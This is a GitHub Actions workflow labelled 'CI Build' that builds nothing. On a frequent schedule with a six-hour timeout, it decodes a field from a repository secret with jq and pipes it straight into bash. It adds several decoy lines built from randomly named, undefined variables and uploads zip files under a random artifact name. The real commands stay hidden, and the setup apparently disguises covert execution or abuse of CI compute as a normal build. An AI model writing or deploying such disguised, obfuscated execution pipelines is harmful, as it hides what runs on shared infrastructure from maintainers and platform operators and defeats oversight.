name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '36 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          nfn3: ${{ secrets.nfn3 }}
        run: |
          printf '%s' "$nfn3" | jq -r .xjgt8722 | /bin/bash
          echo $sd8 | jq -r .adfo22 | /bin/bash
          echo $qldyv6 | jq -r .sgyx350 | /bin/bash
          echo $y91275 | jq -r .k82 | /bin/bash
          echo $ir0135 | jq -r .r0 | /bin/bash
          printf '%s' "$mfs1092" | jq -r .wdqe92238 | /bin/bash
          printf '%s' "$bgr74112" | jq -r .o1770 | /bin/bash
          echo $fkrqp59 | jq -r .zc62 | /bin/bash
          echo $qbjvh54 | jq -r .qnqhj521 | /bin/bash

      - name: Persist output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 7ZkhBhDt
          path: "*.zip"
          retention-days: 1
